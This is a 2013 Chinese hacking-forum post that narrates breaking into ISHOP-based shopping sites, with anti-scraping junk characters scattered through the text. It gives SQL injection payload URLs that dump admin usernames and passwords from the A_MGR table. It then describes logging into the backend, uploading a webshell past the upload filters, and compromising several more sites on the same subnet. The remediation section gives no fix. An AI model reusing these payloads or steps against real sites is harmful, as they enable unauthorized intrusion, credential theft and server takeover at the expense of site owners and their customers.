找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2227|回复: 0
打印 上一主题 下一主题

ISHOP商场建站系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:40:38 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
发现一个注入点
( e- M0 {. Z) {% l7 x4 \, ?+ \http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
; X( k: g) R6 H% K8 p( i/ k  D# C+ M" a" H: }7 X' y
习惯性的加’having1=1--$ V$ [: N4 q+ Z) ~( H1 r

+ g7 ~3 B* D4 o) T. h) B8 A5 k8 H! Vhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—4 u7 _" @2 @) y
3 w' E. B: Z" G$ T, r& J
0. f6 @, U0 W3 Z% X- h! x

! t7 Z$ O$ X0 K, ^: t爆出Diary_A.dl_Title(这时候很激动啊)
& [) I: l$ O! e# j4 k' P
/ d9 {$ y* Y4 W8 c' \那么继续$ r& E9 T' X2 |' \2 W3 @9 w  q- p' g
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—) ~/ F( b  O0 t8 ?

) e( S/ N. ^' m% O# q8 K+ ]继续,一直爆下去& E* L/ t9 H* F* w% y

. i8 L% k- i# N' P7 E+ q# x爆到几个字段和表段 但是没找到需要的管理用户的字段" Y( w7 T" d4 F+ K$ X
" l8 w0 V  i" i/ P  m% s
蛋疼了 怎么办 然后去后台登陆页看源码0 S+ P! ]! b' Z4 J( u6 Z

/ n+ m3 u( _* A. l$ q& p01 z$ Y6 L( w; G, s, v% d4 M
; x  t$ i9 g/ V( Q2 r$ t
Input name= “ADUID”
6 {5 t+ h0 q5 J0 D  P8 }2 B; `4 MInput name= “ADPWD”
% u7 r5 c( W8 Q6 u; z" L; S( d4 u) V2 B. E4 q7 h% [0 x
很幸运 找到了字段那就继续' t/ q  G. z8 q0 g0 B  y
找到之后开始爆用户" V: R9 v& L6 Q. f, x, f- h
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
5 [  E. I, [/ n8 H7 t$ f, `爆密码
, l% t- B' N) h7 y6 khttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—' ], o2 S; o4 ]) n
测试了下 这个注入点只能爆到文章哪里的表
: A$ R* {( `  C3 i% y
1 @$ f( c: B# S头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了3 U% ]1 }: ^6 z% ]; `# n
7 D0 Y: K$ W6 i6 N% b/ o& C
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了7 i8 A" t$ ~. U! |/ m8 U

( M( I5 p. }* M, A: E6 o473
- |$ W, }5 B' c* e1 D. }  i6 N9 o6 e
进后台
- R! h. f! Z  g
# }6 t, N9 Y2 M  s  Z) c. O
0 B0 b# s- L$ H/ E2 {" _. D8 p发现几个上传点 有的地方不能上传 而且防止恶意代码+ r# J7 y4 j$ K
' N3 V/ P3 ~" k
没办法 各种百度各种找大牛 找到一只好像可以突破的马+ ]& ~0 E7 H1 M% n, d, \' ^

( l, v) D' \+ r& q- H
- p0 t8 p  l+ O3 R8 g0 r- R, V在系统管理那里直接上传 不过没有显示地址
7 v( a& d0 w' ^, h( s6 }9 ~3 X# E7 W& u9 T1 i. l$ Q
再上传一次 抓包 搞定OK$ e/ V0 D, c0 A# V

, r. C& ~% Q- g2 L. A! p/ m; U& b1 J+ L+ X; U% z

" O$ f) ?, D2 X9 i  o: q472
  {  n0 M7 C7 P* I) T) I' f! f: @: W; R6 ?+ W* o$ l
晚上不行了 去睡觉。。。
0 L; b3 I+ y2 O& P7 J, X6 q+ C第二天刚起床 闲的没事做继续日站吧 2 ^+ P/ I- T) q, p; T
* [; \0 m" X) n- U& m: n3 ^6 O
找个站 就把这个站的旁c扫了下
+ A1 r/ H; T( Z2 {0 h4 c% L
' E) V, \6 ^) p发现c段也有一个购物站 ,然后还和这个站的模板差不多
& K1 r; h9 W" }( X5 j3 M& O( H& f- S6 ?8 {" c. I
就找到会员登录口测试
- _4 H8 b6 m+ X% ?$ _# a% o# Z
6 ^8 I/ U1 g; s  F'and (select top 1 MGR_UID from A_MGR)>0—7 i; Z" k1 W! n
果断爆到了 这时候我很激动 通杀
  S3 L( z, w! S
9 `! }( b! y% S再次翻c段
  T6 K1 n4 i3 p0 I2 |4 ?2 V3 N, S4 K/ E' ^& A
翻出几个站 都成功拿下
. N" L) a; ?# ^; r9 R) w! _/ \* L8 L( q# L' f# v" O1 V
! ^2 J8 a( [. l: N: P7 Z) X' D  j
. b: y5 f0 e0 Q. N2 W" t! \& q
修复方案:6 [# K# ?1 H5 @  b& T- H; |6 z
他们比我专业 5 T4 X5 o. P% E" }

0 z2 L$ V' ]9 C: @' p& _% D, \5 ^- g0 n9 Y( P: b& [2 H  C

# e) Z$ ]* D7 j6 Q* s0 }
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表